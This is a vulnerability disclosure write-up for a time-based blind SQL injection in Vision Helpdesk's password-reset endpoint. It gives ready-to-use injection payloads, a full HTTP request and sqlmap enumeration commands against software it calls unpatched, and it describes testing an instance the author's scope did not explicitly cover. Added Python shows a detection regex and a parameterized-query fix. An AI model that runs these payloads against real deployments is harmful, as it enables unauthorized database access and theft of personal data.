CVE-2025-32993: Time-Based Blind SQL Injection in Popular Help Desk Software

nav1n
Apr 14, 2025

During a private security assessment for a hosting-related company, I identified a Time-Based Blind SQL Injection vulnerability in a widely used customer support platform — Vision Helpdesk. This application powers numerous help desk and live chat environments — especially in industries such as government, enterprise IT, and web hosting.

Although the provided scope did not explicitly mark any systems as out of scope, reconnaissance revealed an exposed instance of the application. Testing confirmed a SQL injection vulnerability in the Forgot Password module (the /home/forgot-password endpoint), specifically in the vis_username parameter.

I attempted responsible disclosure to the developer multiple times, but the vendor did not address the issue. The vulnerability remains unpatched across all tested versions, including the latest. Alarmingly, the vendor’s own support platform is also affected.

Discovery of the Vulnerability

After observing that the application is built with PHP, I began testing for server-side injection vulnerabilities. The application supports user account creation for tracking support tickets and includes a password reset feature.

To begin testing, I created a temporary account, logged in, and used Burp Suite's intercepting proxy to analyze traffic. After ruling out the login and registration flows as injection vectors, I shifted my focus to the password reset form.

💡 Note: While many deployments appear to have the password reset option disabled in the UI, it can still be accessed directly via:

https://[redacted]/index.php?/home/forgot-password

Vulnerable Parameter & Payload

I tried blind Boolean-based SQL injection testing and identified the vis_username parameter as vulnerable.

Payload used for validation:

vis_username=testuser@test.com" AND (SELECT 9313 FROM (SELECT(SLEEP(6)))mjtc) AND "Dfhc"="Dfhc&vis_operation=reset_password&vis_module=home

This payload induced a ~12-second delay in server response, confirming the vulnerability. The increased delay was likely due to the server triggering multiple internal requests during a password reset.

Observation:
Although the payload specified a 6-second delay, the server response was delayed by approximately 12 seconds. Such amplification is common and can depend on backend processing, database behavior, or application server timeout mechanisms.

Steps To Reproduce:

The vulnerability was successfully reproduced by sending the following payload:

vis_username=testuser@test.com" AND (SELECT 9313 FROM (SELECT(SLEEP(5)))mjtc) AND "Dfhc"="Dfhc&vis_operation=reset_password&vis_module=home

The server response was delayed by approximately 12 seconds, confirming the presence of the Time-Based Blind SQL Injection vulnerability. Note that the server roughly doubled the requested delay, which is considered normal behavior.

HTTP Request (Sanitized)

POST /index.php HTTP/1.1
Host: test.com
Content-Type: application/x-www-form-urlencoded
Referer: https://test.com/index.php?/home/forgot-password
User-Agent: Mozilla/5.0 (...)

vis_username=testuser@test.com" AND (SELECT 9313 FROM (SELECT(SLEEP(5)))mjtc) AND "Dfhc"="Dfhc&vis_operation=reset_password&vis_module=home
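A request of the shape above is also what a defender wants to recognise in web server or WAF logs. The following Python is an added example written for this article, not code from the author or from Vision Helpdesk: it parses a form body, flags parameter values that contain SQL time-delay functions or a quote followed by a boolean operator, and combines that with the request duration, using the roughly 2x amplification observed above as the timing threshold. The sample bodies, their timings and the 1-second baseline are constructed, and the endpoint's real baseline would come from historical measurements.

```python
import re
from urllib.parse import parse_qs

# Assumed typical response time for the forgot-password endpoint (constructed value).
BASELINE_SECONDS = 1.0

# SQL time-delay primitives across common engines; MySQL's SLEEP and BENCHMARK are
# the ones relevant to this PHP/MySQL application.
TIME_DELAY_RE = re.compile(
    r"\b(sleep|benchmark|pg_sleep|dbms_lock\.sleep)\s*\(|waitfor\s+delay\b",
    re.IGNORECASE,
)
# A quote immediately followed by AND/OR: the shape of an injection into a string literal.
QUOTE_LOGIC_RE = re.compile(r"""['"]\s*(and|or)\s+""", re.IGNORECASE)

# Constructed sample records: (application/x-www-form-urlencoded body, elapsed seconds).
SAMPLE_REQUESTS = [
    # benign reset request, normal timing
    ("vis_username=alice%40example.com&vis_operation=reset_password&vis_module=home", 0.9),
    # the payload shape from the writeup, with the amplified delay
    ('vis_username=testuser@test.com" AND (SELECT 9313 FROM (SELECT(SLEEP(6)))mjtc)'
     ' AND "Dfhc"="Dfhc&vis_operation=reset_password&vis_module=home', 12.1),
    # benign body that was merely slow (e.g. mail backend lag): worth a look, not an alert
    ("vis_username=bob%40example.com&vis_operation=reset_password&vis_module=home", 3.4),
]


def scan_form_body(body):
    """Return (parameter, reason) pairs for values that look like SQL injection."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if TIME_DELAY_RE.search(value):
                findings.append((name, "time-delay function"))
            elif QUOTE_LOGIC_RE.search(value):
                findings.append((name, "quote followed by boolean operator"))
    return findings


def classify_request(body, elapsed_seconds, baseline_seconds=BASELINE_SECONDS):
    """Combine payload inspection with timing.

    'alert'  : injection-shaped value AND the response took at least twice the baseline
    'review' : only one of the two signals fired
    'ok'     : neither
    """
    findings = scan_form_body(body)
    slow = elapsed_seconds >= 2 * baseline_seconds
    if findings and slow:
        return "alert"
    if findings or slow:
        return "review"
    return "ok"


def triage(records):
    """Classify a batch of (body, elapsed) records in order."""
    return [classify_request(body, elapsed) for body, elapsed in records]


if __name__ == "__main__":
    for (body, elapsed), verdict in zip(SAMPLE_REQUESTS, triage(SAMPLE_REQUESTS)):
        print(f"{verdict:7} {elapsed:5.1f}s  {scan_form_body(body)}")
```

Matching on the delay primitives alone is brittle against encoding and case tricks, which is why the timing signal is kept as an independent input: a request that is both injection-shaped and unusually slow is the strongest indicator of the behaviour this article describes.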

Full Exploitation with SQLMap

To automate exploitation, I passed the request to SQLMap using the following command:

sqlmap -r request.txt --random-agent -p vis_username --level=2 --delay=1 --proxy https://127.0.0.1:8080 --dbms=mysql

SQLMap confirmed two injection vectors:

Boolean-based blind:

vis_username=test@tets.com" AND 5147=(SELECT (CASE WHEN (5147=5147) THEN 5147 ELSE (SELECT 7301 UNION SELECT 3721) END))--

Time-based blind:

vis_username=test@tets.com" AND (SELECT 9313 FROM (SELECT(SLEEP(5)))mjtc) AND "Dfhc"="Dfhc

Then, using the following command, I was able to enumerate databases and tables:

sqlmap -r request.txt --random-agent -p vis_username --level=2 --delay=1 --proxy https://127.0.0.1:8080 --dbms=mysql -D asd --tables

Impact

  • Remote, unauthenticated attackers can exploit this to execute arbitrary SQL queries.
  • A successful attack could expose or modify sensitive user data, including Personally Identifiable Information (PII).
  • Since the software is widely used in sensitive environments, this poses a significant security risk.
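The root cause behind these impacts is a submitted username reaching the SQL text unparameterized. The following Python/sqlite3 snippet is an added illustration, not the vendor's code: it places the vulnerable string-interpolation pattern beside the parameterized lookup and adds an input-shape check in front of the reset handler. The users table, the accounts in it and the probe string are constructed. The real application is PHP/MySQL, where the equivalent fix is a prepared statement with bound parameters (PDO or mysqli); the mechanism is the same.

```python
import re
import sqlite3

# Minimal shape check for the address a reset form accepts (assumed policy, not the vendor's).
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


def make_db():
    """Constructed in-memory table standing in for the help desk's account store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, email TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice@example.com", "alice@example.com"), ("bob@example.com", "bob@example.com")],
    )
    return conn


def lookup_unsafe(conn, username):
    """Vulnerable pattern: the submitted value becomes part of the SQL text."""
    sql = "SELECT id FROM users WHERE username = '%s'" % username
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, username):
    """Hardened pattern: a bound parameter is data and can never become SQL syntax."""
    rows = conn.execute("SELECT id FROM users WHERE username = ?", (username,))
    return [row[0] for row in rows]


def request_reset(conn, submitted):
    """Reset handler with defence in depth: validate the shape, then query with a bound parameter.

    Returns (status, ids_that_would_receive_a_token). The id list is internal bookkeeping;
    the HTTP response to the client must be identical whether or not an account matched,
    so that the endpoint cannot be used to enumerate users.
    """
    if not EMAIL_RE.match(submitted):
        return ("rejected", [])
    return ("accepted", lookup_safe(conn, submitted))


if __name__ == "__main__":
    db = make_db()
    probe = "nobody@example.com' OR '1'='1"  # constructed boolean probe in the article's style
    print("unsafe:", lookup_unsafe(db, probe))   # every account matches
    print("safe:  ", lookup_safe(db, probe))     # no account matches
    print("reset: ", request_reset(db, probe))   # rejected before any query runs
```

The shape check is not the fix; the bound parameter is. Validation merely keeps obviously malformed input from reaching the database layer at all, which also removes the timing side channel that made the blind technique in this article work.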

Final Notes

  • The vulnerability has been verified and reproduced multiple times.
  • Vendor was notified, but no fix has been provided as of writing.
  • CVE: CVE-2025-32993.

Thank you
